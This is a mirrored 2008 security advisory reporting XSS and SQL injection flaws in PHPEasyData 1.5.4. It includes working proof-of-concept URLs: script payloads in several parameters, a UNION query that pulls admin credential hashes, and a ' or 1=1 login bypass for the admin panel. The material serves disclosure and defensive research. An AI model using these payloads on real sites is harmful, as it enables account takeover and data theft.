Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20022
HistoryJun 11, 2008 - 12:00 a.m.

PHPEasyData 1.5.4 Multiple Vulnerabilities

2008-06-1100:00:00
vulners.com
26
JSON

PHPEasyData

Informations :

Langage : PHP
Version : 1.5.4
Website : http://www.phpeasydata.com/
Problems : Multiple vulnerabilities

Description:

PHPEasyData is a PHP application which allow you to manage and display on the web your dynamics data and directories.

Details :

Xss

There are multiple xss vulnerabilities.
Demonstration exploit URL:

-last_records.php:
http://[website]/last_records.php?annuaire=%3Cscript%3Ealert(document.cookie)%3C/script%3E

-annuaire.php:
http://[website]/annuaire.php?annuaire=30&sort_field=2&cat_id=&by=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[website]/annuaire.php?annuaire=30&sort_field=2&cat_id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[website]/annuaire.php?annuaire=%3Cscript%3Ealert(document.cookie)%3C/script%3E

SQL Injection

-annuaire.php
http://[website]/annuaire.php?annuaire=29%20union%20select%20user_pass,user_login,user_fname,user_access%20from%20an_users

With this url we can have the admin password(crypted with md5) for example.

-admin/login.php
Due to a lack of sanitization of the user input in admin/login.php we can easily get an access to the admin control panel with the login:
' or 1=1-- /**

Credits:

Autor : Sylvain THUAL
E-mail : [email protected]
Website : http://www.click-internet.fr

JSON